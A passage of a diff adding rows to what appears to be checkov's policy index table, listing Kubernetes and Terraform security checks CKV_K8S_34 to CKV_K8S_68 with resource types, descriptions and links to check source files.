+| 3034 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3035 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3036 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3037 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 3038 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 3039 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 3040 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 3041 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3042 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3043 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3044 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3045 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3046 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3047 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3048 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3049 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3050 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) |
+| 3051 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 3052 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 3053 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 3054 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 3055 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) |
+| 3056 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) |
+| 3057 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3058 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3059 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3060 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3061 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3062 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3063 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3064 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3065 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3066 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) |
+| 3067 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
+| 3068 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
+| 3069 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
+| 3070 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | 
[MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 3071 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3072 | CKV_K8S_38 | resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3073 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3074 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3075 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3076 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3077 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | 
[ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3078 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 3079 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3080 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3081 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3082 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3083 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3084 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3085 | 
CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3086 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3087 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3088 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 3089 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 3090 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 3091 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 3092 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | 
Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 3093 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3094 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3095 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3096 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3097 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3098 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3099 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | 
[RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3100 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 3101 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) | +| 3102 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 3103 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 3104 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 3105 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 3106 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | 
[DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 3107 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 3108 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 3109 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 3110 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3111 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3112 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3113 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3114 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3115 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3116 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3117 | CKV_K8S_43 | resource | ReplicaSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3118 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3119 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 3120 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 3121 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 3122 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 3123 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 3124 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | +| 3125 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 3126 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 3127 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3128 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3129 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3130 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | 
[TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3131 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3132 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3133 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3134 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3135 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3136 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 3137 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and 
ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 3138 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 3139 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 3140 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 3141 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 3142 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 3143 | CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3144 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3145 | CKV_K8S_68 | resource | Deployment | Ensure that the 
--anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3146 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3147 | CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3148 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3149 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3150 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3151 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 3152 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
